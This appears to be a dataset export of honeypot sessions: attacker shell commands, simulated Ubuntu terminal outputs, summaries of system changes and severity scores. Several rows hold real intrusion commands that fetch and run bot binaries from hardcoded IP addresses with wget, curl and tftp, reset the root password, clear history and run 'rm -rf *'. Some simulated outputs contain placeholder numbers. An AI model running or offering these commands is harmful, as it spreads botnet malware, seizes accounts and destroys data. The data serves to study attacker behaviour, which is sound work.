78acf43ee114 | 2021_2022 | 0 | cd /tmp || cd /var/run || cd /sys || cd /bin || cd /mnt || cd /root || cd /; wget http://109.104.151.108/mtro/zmbot.x86; busybox wget http://109.104.151.108/mtro/zmbot.x86; curl -O http://109.104.151.108/mtro/zmbot.x86; chmod +x zmbot.x86; ./zmbot.x86 Selfrep.x86; tftp 109.104.151.108 -c get xbot; chmod 777 xbot; ./xbo... | root@ubuntu:~# cd /tmp || cd /var/run || cd /sys || cd /bin || cd /mnt || cd /root || cd /
root@tmp:~# wget http://109.104.151.108/mtro/zmbot.x86
--2023-10-31 16:25:27-- http://109.104.151.108/mtro/zmbot.x86
Connecting to 109.104.151.108:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28 [appli... |
- The terminal changed the working directory to '/tmp'.
- Two executable files 'zmbot.x86' and 'xbot' were downloaded from the server with IP '109.104.151.108' using different methods (wget, curl, tftp).
- The downloaded executables were given full permissions and executed with different arguments.
- All executables w... | 4 | curated_ubuntu |
0c084dcdfc22 | 2021_2022 | 0 | cat /proc/cpuinfo | grep name | wc -l | root@ubuntu:~# cat /proc/cpuinfo | grep name | wc -l
24
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
0c084dcdfc22 | 2021_2022 | 1 | echo "root:uw0iZ8ipozZU"|chpasswd|bash | root@ubuntu:~# echo "root:uw0iZ8ipozZU"|chpasswd|bash
root@ubuntu:~# | The password for the root user has been changed to 'uw0iZ8ipozZU'. | 4 | curated_ubuntu |
0c084dcdfc22 | 2021_2022 | 2 | cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' | root@ubuntu:~# cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
Intel(R) Xeon(R) Silver 4214 CPU @ 2.20GHz
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
0c084dcdfc22 | 2021_2022 | 3 | free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' | root@ubuntu:~# free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
725938364 123456 234567 345678 456789 567890
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
0c084dcdfc22 | 2021_2022 | 4 | ls -lh $(which ls) | root@ubuntu:~# ls -lh $(which ls)
-rwxr-xr-x 1 root root 129K Jan 18 2023 /bin/ls
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
0c084dcdfc22 | 2021_2022 | 5 | which ls | root@ubuntu:~# which ls
/bin/ls
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
0c084dcdfc22 | 2021_2022 | 6 | crontab -l | root@ubuntu:~# crontab -l
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hou... | No changes to the system. | 0 | curated_ubuntu |
0c084dcdfc22 | 2021_2022 | 7 | w | root@ubuntu:~# w
16:27:52 up 2:00, 1 user, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 192.168.1.100 14:27 0.00s 0.04s 0.00s w
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
0c084dcdfc22 | 2021_2022 | 8 | uname -m | root@ubuntu:~# uname -m
x86_64
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
0c084dcdfc22 | 2021_2022 | 9 | cat /proc/cpuinfo | grep model | grep name | wc -l | root@ubuntu:~# cat /proc/cpuinfo | grep model | grep name | wc -l
24
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
0c084dcdfc22 | 2021_2022 | 10 | top | root@ubuntu:~# top
top - 16:29:07 up 2:00, 1 user, load average: 0.00, 0.01, 0.05
Tasks: 88 total, 1 running, 87 sleeping, 0 stopped, 0 zombie
%Cpu(s): 0.3 us, 0.1 sy, 0.0 ni, 99.6 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
MiB Mem : 725938364 total, 123456 free, 234567 used, 345678 buff/cache
MiB Swap: ... | None | 0 | curated_ubuntu |
0c084dcdfc22 | 2021_2022 | 11 | uname | root@ubuntu:~# uname
Linux
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
0c084dcdfc22 | 2021_2022 | 12 | uname -a | root@ubuntu:~# uname -a
Linux ubuntu 5.4.0-159-generic #176-Ubuntu SMP Wed Oct 13 16:45:01 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
0c084dcdfc22 | 2021_2022 | 13 | lscpu | grep Model | root@ubuntu:~# lscpu | grep Model
Model name: Intel(R) Xeon(R) Silver 4214 CPU @ 2.20GHz
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
81b0b3a098a6 | 2021_2022 | 0 | cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://179.43.176.41/1a9zxq/meth.x86; cat meth.x86 > meth; chmod +x meth; chmod 777 *; ./meth rooted; cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://179.43.176.41/cometome; cat cometome > meth; chmod +x... | root@ubuntu:~# cat /etc/issue
Ubuntu 18.04.1 LTS \n \l
root@ubuntu:~# cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
root@/:# wget -q http://179.43.176.41/1a9zxq/meth.x86
root@/:# cat meth.x86 > meth
root@/:# chmod +x meth
root@/:# chmod 777 *
root@/:# ./meth rooted
root@/:# cat /etc/issue
Ubuntu 18.04.1 LTS \n... |
- The terminal changed the working directory to '/'.
- Two files were downloaded from the server with IP '179.43.176.41' using wget.
- The downloaded files were renamed to 'meth', given execute permissions, and executed.
- All files in the '/' directory were given full permissions.
- The command history was cleared. | 4 | curated_ubuntu |
e4269ef7fea5 | 2021_2022 | 0 | cd /tmp cd /run cd /; wget http://134.122.67.26/yoyobins.sh; chmod 777 yoyobins.sh; sh yoyobins.sh; tftp 134.122.67.26 -c get yoyotftp1.sh; chmod 777 yoyotftp1.sh; sh yoyotftp1.sh; tftp -r yoyotftp2.sh -g 134.122.67.26; chmod 777 yoyotftp2.sh; sh yoyotftp2.sh; rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh; rm -rf * | root@ubuntu:~# cd /tmp cd /run cd /
root@/:~# wget http://134.122.67.26/yoyobins.sh
--2023-10-31 16:31:32-- http://134.122.67.26/yoyobins.sh
Connecting to 134.122.67.26:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28 [application/x-sh]
Saving to: ‘yoyobins.sh’
100%[=======================... |
- The terminal changed the working directory to '/'.
- Three shell scripts were downloaded from the server with IP '134.122.67.26' using different methods (wget, tftp).
- The downloaded scripts were given full permissions and executed.
- All scripts and all files in the '/' directory were removed. | 4 | curated_ubuntu |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.